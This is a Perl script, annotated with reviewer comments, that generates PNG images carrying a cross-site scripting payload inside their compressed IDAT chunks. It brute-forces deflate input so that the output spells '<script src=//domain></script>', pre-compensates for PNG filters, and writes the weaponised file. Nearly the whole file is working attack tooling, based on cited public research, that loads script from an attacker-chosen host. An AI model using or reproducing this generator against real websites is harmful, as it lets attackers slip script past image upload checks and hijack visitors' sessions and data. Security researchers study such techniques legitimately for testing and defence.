#!/usr/bin/perl
#
# PNG IDAT chunks ~ payload generator
# Credits to: @Adam_Logue || @fin1te || idontplaydarts
#
# https://www.adamlogue.com/revisiting-xss-payloads-in-png-idat-chunks/
# https://whitton.io/articles/xss-on-facebook-via-png-content-types/
# https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
#
use strict;
use warnings;
no warnings 'portable'; # Hexadecimal number > 0xffffffff non-portable
use GD;
use POSIX;
use Getopt::Long;
use String::HexConvert ':all'; # Wrapper around pack and unpack
use IO::Compress::Deflate qw(deflate $DeflateError); # Write RFC 1950 compressed data to files/buffers
# Command line options
# NOTE(review): none of these specs carries a "=s" suffix, so Getopt::Long
# treats all three as boolean flags: "-domain xxe.cz" sets $opt_domain to 1
# and leaves "xxe.cz" in @ARGV. The real values are read positionally below,
# so the command line must list the domain before the output path.
# $options (GetOptions' success/failure result) is never checked.
my $options = GetOptions(
"help" => \my $opt_help,
"domain" => \my $opt_domain,
"output" => \my $opt_output
);
print "[ PNG IDAT chunks ~ payload generator ]\n\n";
# help() only prints; it does not exit, so the run continues past this line.
help() if $opt_help;
# Positional leftovers after flag parsing: domain first, then output path.
my ($domain, $output) = @ARGV;
if(not defined($opt_domain)) {
print "[?] Usage: perl $0 -domain xxe.cz -output xss.png\n";
die("[?] More info: perl $0 -help\n\n");
}
elsif(not defined($opt_output)) {
# Default output file when -output is absent. If -domain was given without
# a positional value, $domain is still undef here and length() below warns.
$output = "xss_chunks.png";
}
# Config variables
my $domain_length = length($domain);
# Search bounds as hex-literal strings, two hex digits per domain character
# ("0x1111.." to "0xffff.."). bruteforce() converts them with a string eval;
# the only variable part is the domain *length*, never the domain text.
# Values above 32 bits rely on 'no warnings portable' at the top of the file.
my $brute_start = "0x"."11" x $domain_length;
my $brute_end = "0x"."ff" x $domain_length;
# Uppercased so bruteforce()/create_png() can match case-insensitively by
# uppercasing the compressed output before index().
my $payload = uc("<script src=//".$domain."></script>");
my $hex_payload = ascii_to_hex($payload);   # not referenced anywhere else in this file
my $hex_found;   # hex form of the winning input bytes; set by bruteforce(), printed by create_png()
# Main subs
my @bytes = bruteforce(); # GZDeflate payload fuzzing
my @png_array = png_filters(@bytes); # Reversing PNG filters (1, 3)
create_png(@png_array); # Generating .png file with chunks test
# Search a counter range for input bytes whose deflate-compressed form contains
# $payload (case-insensitively). Reads the file-level $domain, $domain_length,
# $payload, $brute_start and $brute_end; assigns $hex_found on success.
# Returns the winning input as a list of "0x.." hex-byte strings, or dies once
# the range is exhausted. Prints progress to STDOUT along the way.
sub bruteforce {
print "[i] Starting bruteforce\n";
print "[i] Domain: ".$domain."\n";
if($domain_length > 6) {
# The counter is 2 hex digits per domain character; above 8 characters the
# literal no longer fits a 64-bit integer, so the loop's behaviour is
# questionable well before that. (Message text says "now"; presumably "not".)
print "[?] Domain too long ~ it might now work!\n";
}
print "[i] Payload: ".$payload."\n";
print "[i] It will take some time ~ please wait :)\n\n";
# Append & Prepend 0x00 -> 0xff to the hex_payload
# Both bounds are hex-literal strings built at file scope from the domain
# length only, so the string eval never sees user-supplied text. The upper
# bound is exclusive (<), and eval($brute_end) is re-run on every iteration.
for (my $i = eval($brute_start); $i < eval($brute_end); $i++) {
# No zero padding needed: the counter starts at 0x11.., so the formatted
# value always has exactly 2 * $domain_length hex digits.
my $brute = sprintf("%x",$i);
# Binary data for GZDeflate
# Fixed prefix/suffix bytes surround the counter; the same hex strings are
# repeated in the comments at the end of the file.
my $bin_brute = hex_to_ascii("f399281922111510691928276e6e".$brute."1f576e69b16375535b6f0e7f");
my $out; # GZDeflate output as a scalar reference
# NOTE(review): the import comment above says IO::Compress::Deflate writes
# RFC 1950 (zlib-wrapped) data, whereas PHP gzdeflate() emits a raw stream;
# the index() search below does not care about the wrapper.
deflate \$bin_brute => \$out or die "Deflate failed: $DeflateError\n"; # PHP GZDeflate
if (index(uc($out), $payload) != -1) { # Search payload in uppercase GZDeflate output
print "[!] Lucky one ~ bruteforce successfully completed\n";
print "[i] Trying to apply PNG filters\n\n";
$hex_found = ascii_to_hex($bin_brute);   # file-level; reported later by create_png()
my @bytes = map "0x$_", $hex_found =~ /../sg; # Hex bytes need to be separated 0x13, 0x37, ...
return @bytes;
# die;   (unreachable after the return above)
}
}
die("[x] Failed to bruteforce payload :(\n\n");
}
# Pre-compensate for PNG scanline filtering: returns two copies of @_ back to
# back, the first adjusted for filter type 1 (Sub) and the second for filter
# type 3 (Average), each element a "0x.." hex-byte string. Prints one progress
# line. Inputs shorter than four bytes come back unchanged (twice).
sub png_filters {
    my @sub_bytes = @_;
    my @avg_bytes = @_;

    # http://www.libpng.org/pub/png/spec/1.2/PNG-Filters.html
    # bpp is 3 (one RGB pixel), so every byte is adjusted against the byte
    # three positions earlier. The adjustment is cumulative: it reads the
    # predecessor as already rewritten by an earlier iteration.
    my $bpp  = 3;
    my $last = $#sub_bytes - $bpp;

    # Reverse filter type 1 (Sub): Sub(x) + Raw(x-bpp)
    for my $i (0 .. $last) {
        my $sum = hex($sub_bytes[$i + $bpp]) + hex($sub_bytes[$i]);
        $sub_bytes[$i + $bpp] = sprintf('0x%x', $sum % 256);
    }

    # Reverse filter type 3 (Average): Average(x) + floor((Raw(x-bpp)+Prior(x))/2)
    # The Prior(x) term is left out, consistent with create_png() writing all
    # pixels onto the first scanline.
    for my $i (0 .. $last) {
        my $sum = hex($avg_bytes[$i + $bpp]) + floor(hex($avg_bytes[$i]) / 2);
        $avg_bytes[$i + $bpp] = sprintf('0x%x', $sum % 256);
    }

    print "[i] PNG filters done\n";
    return (@sub_bytes, @avg_bytes);
}
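# Write the filtered bytes into a 32x32 truecolor PNG, three bytes per pixel
# along the first scanline, and save it to $output (file-level) only when the
# encoded PNG still contains $payload (file-level). Prints progress and, on
# success, $hex_found (file-level, assigned by bruteforce()). Dies when the
# output file cannot be opened, written or closed.
sub create_png {
    my (@png_array) = @_;
    print "[i] Generating output file\n\n";

    # Create a new image; third argument 1 = Truecolor (24 bits of color
    # data), the default being an 8-bit palette. Class-method call form is
    # used instead of the indirect-object `new GD::Image(...)` spelling.
    my $img   = GD::Image->new(32, 32, 1);
    my $color = $img->colorAllocate(0, 0, 0);   # black
    $img->fill(0, 0, $color);                    # black background

    # Each triple of bytes becomes one RGB pixel on row 0; a trailing partial
    # triple is padded with 0x00 via the `|| 0` fallbacks.
    # NOTE(review): the image is 32 pixels wide, so more than 32 triples would
    # address columns past the edge — GD presumably ignores those; not confirmed.
    my $x = 0;
    for (my $i = 0; $i < scalar @png_array; $i += 3, $x++) {
        my $r = hex($png_array[$i]     || 0);
        my $g = hex($png_array[$i + 1] || 0);
        my $b = hex($png_array[$i + 2] || 0);
        $color = $img->colorAllocate($r, $g, $b);
        $img->setPixel($x, 0, $color);
    }

    # Encode once so the bytes that are checked are the bytes that get written
    # (the original called ->png twice).
    my $png_data = $img->png;
    if (index(uc($png_data), $payload) != -1) {
        print "[!] PNG with payload successfully generated\n";
        print "[!] Hex payload: ".$hex_found."\n";
        # Three-arg open with a lexical handle; report the path and errno
        # instead of a bare die.
        open my $out, '>', $output or die "open $output: $!\n";
        binmode $out;
        print {$out} $png_data or die "write $output: $!\n";
        # Buffered write errors only surface at close, so it is checked too.
        close $out or die "close $output: $!\n";
        print "[i] File saved to: ".$output."\n\n";
    }
    else {
        print "[x] Bad png file, this might not work\n\n";
    }
    return;
}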
# Print a one-line pointer to the project's GitHub page. Invoked for -help;
# it does not exit, so the caller carries on after it returns.
sub help {
    my $hint = '[?] Visit GitHub for help ~ xexexe';
    print $hint, "\n";
}
# strings output.png
# hexdump -c output.png
# apt-get install libgd-perl
# f399281922111510691928276e6e".$brute."1f576e69b16375535b6f0e7f
# 7ff399281922111510691928276e6e".$brute."1f576e69b16375535b6f
#
# php -r "echo gzdeflate(hex2bin('f399281922111510691928276e6e562e2c1e581b1f576e69b16375535b6f0e7f')) . PHP_EOL;"
# php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"